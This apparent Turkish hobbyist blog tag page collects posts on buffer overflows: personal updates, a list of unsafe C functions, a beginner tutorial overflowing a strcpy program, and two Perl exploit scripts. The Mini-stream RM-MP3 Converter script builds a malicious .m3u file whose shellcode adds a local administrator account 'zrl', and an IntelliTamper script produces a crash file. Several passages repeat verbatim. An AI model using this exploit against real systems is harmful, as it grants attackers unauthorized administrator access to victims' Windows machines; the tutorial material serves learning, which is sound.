buffer overflow etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
buffer overflow etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
26 Temmuz 2011 Salı
özlemişim :))
ocak 17-temmuz 26 baya bi zaman geçmiş :)) pr aşağı düşmüş aşağılık kopmleksi yaşıyormuş :P doktor muhtemelen asker ;) life kardeşimle görüşemedim bile :(( bla aylardır bloğuna uğramamış ben gibi :(( vs vs vs ben neler yaptım küçük bi site tasarladım public yaparım çok eksiği var :) ama tema vs beni sardı. buffer overflow a baya bi yoğunlaştım ara ara kafayı mı yiyorum diye tereddütler yaşayınca aralar verdim :) verdiğim aralarda da siteyi tasarladım :) php baya bi ilerlettim yani uzmanlık seviyesinde değil ama benim işimi görüyor. bol bol lfi ile uğrastım :DD keza python yine baş tacı :)) 20 bilemedin 25 gün kadar da kpss hazırlandım çok bile :)) bu kadar başka değişiklik yok.
17 Ocak 2011 Pazartesi
Mini-stream RM-MP3 Converter Buffer Overflow Exploit
# Title : Mini-stream RM-MP3 Converter Buffer Overflow Exploit
# Author : ZoRLu
# Proof : http://img843.imageshack.us/img843/3144/buffer.jpg
# Desc. : usr: zrl , pass: 123456 , localgroup: Administrator
#Tested : xp/sp3
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 04/01/2011
# Teşekkür : Dr.Ly0n LifeSteaLeR
my $dosya= "zrl.m3u";
my $zart= "\x41" x 26059;
my $zurt= "\x90" x 24;
my $eip = pack('V',0x7E3EA32F); # 0x7E3EA32F user32.dll jmp esp
# windows/exec - 127 bytes
# Thanks to http://www.exploit-db.com/exploits/15063/
# Encoder: win32/ZoRLu
# Desc.: usr: zrl , pass: 123456
# CMD=Add Admin
my $shell = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x5d\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73".
"\x65\x72\x20\x7a\x72\x6c\x20\x31\x32\x33\x34\x35\x36\x20\x2f\x61\x64".
"\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f".
"\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73".
"\x20\x2f\x61\x64\x64\x20\x7a\x72\x6c\x20\x26\x26\x20\x6e\x65\x74\x20".
"\x75\x73\x65\x72\x20\x7a\x72\x6c";
open($FILE,">$dosya");
print $FILE $zart.$eip.$zurt.$shell;
close($FILE);
print "\n$dosya Dosyasi Hazir\n";
7 Ağustos 2010 Cumartesi
findjmp
buffer overflow ile ilgilenenlerin işine yarar aradım zor buldum a.q :S sizlerlede paylaşayım kullanırsınız
Not:
içiniz rahat olsun dosyayı gönül rahatlığıyla indirip kullanabilirsiniz bende yamuk olmaz ;)
download:
http://hotfile.com/dl/60589778/0841783/findjmp.zip.html
Not:
içiniz rahat olsun dosyayı gönül rahatlığıyla indirip kullanabilirsiniz bende yamuk olmaz ;)
download:
http://hotfile.com/dl/60589778/0841783/findjmp.zip.html
Etiketler:
buffer overflow,
buffer overflow exploit yazma,
findjmp,
findjmp.exe
16 Ekim 2009 Cuma
beynimde buffer overflow :( msnim hacklen(me)miş olabilir
şurdan vardım o kanıya birincisi hiç oturum acılmadı benim msn de a.q hiç olmasa hacked by x yazıp hava atardı hackleyen ben rastlamadım rastlayan olduysa burdan bildirsin lütfen ;) ikincisi benim msn ile bloğuda hackleyebilirdi fakat herhangi bi hamle yapılmamış yani sifre talep edip bloğu ele gecirebilirdi hackleyen kişi. geriye tek bi ihtimal kaldı msn şifremi değiştim fakat şimdi hatırlayamıyorum. o günlerde buffer overflow ile meşguldüm en sonunda başardım 2 program için buffer overflow exploit yazdım onu başardım fakat farkında olmadan beynimde de bi hafıza taşması oldu mu diye düşünmüyor değilim :( biraz mola vermenin zamanı geldi gibi :(
3 Temmuz 2009 Cuma
Buffer Overflowa Sebep Olan Fonksiyonlar
gets() -> fgets() – karakterleri okur
strcpy() -> strncpy() – içeriği önbelleğe kopyalar.
strcat() -> strncat() – önbellek birleştirme, sıralama
sprintf() -> snprintf() – önbelleği farklı tipteki verilerle doldurur
(f)scanf() – STDIN’den okur
getwd() – çalışılan dizini döndürür
realpath() – tam yolu döndürür
strcpy() -> strncpy() – içeriği önbelleğe kopyalar.
strcat() -> strncat() – önbellek birleştirme, sıralama
sprintf() -> snprintf() – önbelleği farklı tipteki verilerle doldurur
(f)scanf() – STDIN’den okur
getwd() – çalışılan dizini döndürür
realpath() – tam yolu döndürür
Etiketler:
buffer overflow,
buffer overflow fonksiyonları,
sprintf,
strcat,
strcpy
2 Temmuz 2009 Perşembe
buffer overflow mantığı
kafayı yedim a.q buffer yüzünden ama nettim nettim öğrendim mantığını azda olsa :P şimdi mantık su her programda geçici hafıza (stack) mevcut eğer bu geçici hafıza denetimi sağlam olmazsa gerekenden fazla veri göndererek hafızada tasmaya sebep olabiliriz. diyelim programdan bi bi istekte bulunduk program isteği alıyor ve iletiyor aynı yolu takip ederek size cevap veriyor. işte eğer hafıza taşmasına sebep olursak geri dönüşte bizim belirlediğimiz yolu takip etmesini sağlayabiliriz. ve bizim belirlediğimiz yol ilede kendi exp. imizi çalıştırabiliyoruz. linux içinde root exp yazmanın mantığı bu. diyelim ki linux ta bi modül de şöyle bi fonksiyon olsun:
(unutmayın bu buffer işinde süper değilim hatta kötüyüm sadece ingilizce dökümanlardan çıkardığım mantığı anlatmaya çalışıyorum)
işte linuxta ki bir misali modülümüz ve içinde şu kodu barındırıyor olsun (kodu .c uzantılı kaydedin) :
void main(int argc, char **argv, char **envp) {
char array[200];
strcpy(array,argv[1]);
}
kodumuzu kaydedip derliyoruz nasılmı şöyle:
zorlu@ZoRLu:~/Masaüstü$ gcc buf.c -o buf1
buf.c: In function 'main':
buf.c:4: UYARI: 'strcpy' yerleşik işlevinin uyumsuz örtük bildirimi
buf.c:1: UYARI: 'main' için dönüş türü 'int' değil
zorlu@ZoRLu:~/Masaüstü$ chmod 777 buf1
ve derledikten sonra chmod ayarınıda yapıp çalıştırıyoruz:
zorlu@ZoRLu:~/Masaüstü$ ./buf1
ve şu hatayı alıyoruz:
Segmentation fault ( yani core dumped)
şimdi küçük bi işlemle dosyamıza veri gönderiyoruz:
şekilde gibi belli bir veriden sonra buffer olayı gercekleşiyor

şimdi core dumped hatasını alabileceğimiz veri miktarını buluyoruz ve ben buldum kurduğum ubuntuda:
zorlu@ZoRLu:~/Masaüstü$ ./buf1 `perl -e 'print "A" x 362'`BBBB
Segmentation fault
işte asıl işlemler bundan sonra başlıyor yok efenim eax, jmp vs vs daha okadar ileri gidemedim. umarım azda olsa sizde mantığını anlarsınız
(unutmayın bu buffer işinde süper değilim hatta kötüyüm sadece ingilizce dökümanlardan çıkardığım mantığı anlatmaya çalışıyorum)
işte linuxta ki bir misali modülümüz ve içinde şu kodu barındırıyor olsun (kodu .c uzantılı kaydedin) :
void main(int argc, char **argv, char **envp) {
char array[200];
strcpy(array,argv[1]);
}
kodumuzu kaydedip derliyoruz nasılmı şöyle:
zorlu@ZoRLu:~/Masaüstü$ gcc buf.c -o buf1
buf.c: In function 'main':
buf.c:4: UYARI: 'strcpy' yerleşik işlevinin uyumsuz örtük bildirimi
buf.c:1: UYARI: 'main' için dönüş türü 'int' değil
zorlu@ZoRLu:~/Masaüstü$ chmod 777 buf1
ve derledikten sonra chmod ayarınıda yapıp çalıştırıyoruz:
zorlu@ZoRLu:~/Masaüstü$ ./buf1
ve şu hatayı alıyoruz:
Segmentation fault ( yani core dumped)
şimdi küçük bi işlemle dosyamıza veri gönderiyoruz:
şekilde gibi belli bir veriden sonra buffer olayı gercekleşiyor

şimdi core dumped hatasını alabileceğimiz veri miktarını buluyoruz ve ben buldum kurduğum ubuntuda:
zorlu@ZoRLu:~/Masaüstü$ ./buf1 `perl -e 'print "A" x 362'`BBBB
Segmentation fault
işte asıl işlemler bundan sonra başlıyor yok efenim eax, jmp vs vs daha okadar ileri gidemedim. umarım azda olsa sizde mantığını anlarsınız
10 Nisan 2009 Cuma
intellitamper v2.07 (.txt file ) Local buffer overflow POC
kaynak: http://packetstormsecurity.org/0904-exploits/intellitamper207-overflow.txt
Kaynak: http://www.yildirimordulari.com/showthread.php?t=3913
Kaynak: http://www.yildirimordulari.com/showthread.php?t=3913
# Author: ZoRLu
# Home: yildirimordulari.com & z0rlu.blogspot.com & dafgamers.com
# Msn: trt-turk@hotmail.com
# Not: herkes hecker olmus :S
# intellitamper v2.07 (.txt file ) Local buffer overflow POC
# EAX 7EFEFEFE
# ECX 3F82EA97
# EDX 41414141
# EBX FE0C702F
# ESP 001235C8
# ESI 01F455A4
# EDI 00130000 ASCII "Actx "
# EIP 00416369 intellit.00416369
# EDX 41414141 for char 50644
# --------------------------------------------------------
#!/usr/bin/perl
#[*] intellitamper v2.07 (.txt file ) Local buffer overflow POC
use warnings;
use strict;
my $chars = "\x41" x 50644 ;
my $file="z0rlu.txt";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file Dosya Hazir. \n";
# ----------------------------------------------------------
Kaydol:
Kayıtlar (Atom)